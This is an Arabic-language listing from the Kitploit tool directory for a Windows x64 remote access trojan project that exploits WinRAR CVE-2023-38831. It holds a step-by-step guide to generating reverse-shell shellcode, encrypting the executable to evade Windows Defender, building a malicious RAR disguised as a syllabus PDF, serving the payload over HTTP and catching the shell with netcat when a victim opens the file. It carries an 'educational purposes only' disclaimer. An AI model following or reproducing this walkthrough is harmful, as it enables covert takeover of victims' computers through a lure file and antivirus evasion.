Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Windows-X64-RAT — حصان طروادة للوصول عن بُعد (RAT) لنظام Windows x64 باستخدام مزيج من الثغرة CVE-2023-38831 (ثغرة WinRAR < 6.23) وتقنية استغلال Shellcode. | Kitploit
أدوات/GitHubGitHub/maorbuskila/windows-x64-rat
تحليل الثغرات الأمنيةالاستغلالشيل كودالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتحصان طروادة للوصول عن بعداستغلال الملفات الثنائية
GitHubmaorbuskila/windows-x64-rat

Windows-X64-RAT

حصان طروادة للوصول عن بُعد (RAT) لنظام Windows x64 باستخدام مزيج من الثغرة CVE-2023-38831 (ثغرة WinRAR < 6.23) وتقنية استغلال Shellcode.

عرض المستودع
250منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حصان طروادة للوصول عن بُعد لنظام Windows x64 (RAT)

الهدف

تطوير حصان طروادة للوصول عن بُعد لنظام Windows x64 باستخدام CVE-2023-38831 (WinRAR < 6.23) واستغلال شيلكود لتجاوز Windows Defender.

وصف النظام

  1. تهيئة الشيلكود
    • إنشاء شيلكود باستخدام Windows/x64 - شيلكود شل عكسي TCP خالٍ من القيم الصفرية (PIC Null-Free TCP Reverse Shell Shellcode).
  2. شرح main.cpp
    • حقن وتنفيذ الشيلكود في الذاكرة لإنشاء اتصال TCP عكسي.
  3. ترجمة وتشفير main.cpp
    • ترجمة ملف C++ إلى ملف تنفيذي وتشفيره.
  4. استغلال ثغرة WinRAR CVE-2023-38831
    • استخدام الثغرة لتنزيل وفك تشفير وتنفيذ الـ RAT المشفر.
  5. نص فك التشفير والتنفيذ (decrypt_file.ps1)
    • فك تشفير وتنفيذ الملف التنفيذي الذي تم تنزيله.
  6. التنفيذ
    • فتح ملف PDF/صورة مصممة لتشغيل اتصال الشل العكسي.

دليل الاستغلال

تحذير: هذه المعلومات مخصصة للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذه التقنيات غير قانوني وغير أخلاقي.

تعليمات خطوة بخطوة

صنع الشيلكود
  • استخدم 51721.py لإنشاء الشيلكود الأولي.
  • تعديل الشيلكود وترجمته

    • قم بإجراء التعديلات اللازمة على الشيلكود.
    • ترجمة الكود المعدل.
  • تشفير الملف التنفيذي

    • استخدم decrypt_file.ps1 لتشفير الملف التنفيذي المُجمّع:
      root@kitploit:~
      .\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
      
  • إنشاء أرشيف WinRAR

    • استخدم cve-2023-38831-exp-gen.py لإنشاء الأرشيف:
      root@kitploit:~
      python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
      
  • إعداد خادم Python لتنزيل الملفات

    • انتقل إلى الدليل الذي يحتوي على enc_main.exe و decrypt_file.ps1.
    • ابدأ خادم HTTP بلغة Python:
      root@kitploit:~
      python3 -m http.server 8000
      
  • الاستعداد للاستماع لشل TCP العكسي

    • افتح Netcat للاستماع لاتصالات TCP الواردة:
      root@kitploit:~
      nc -lnvp 4444
      
  • تشغيل شل TCP العكسي

    • عندما يفتح الضحية ملف PDF، سيتم تشغيل اتصال TCP العكسي، مما يمنحك الوصول إلى جهازه.
  • إخلاء مسؤولية

    يتم تقديم هذه المعلومات للأغراض التعليمية فقط. استخدام هذا الاستغلال دون إذن صريح غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن أي سوء استخدام لهذه المعلومات.

    تنزيل الأداة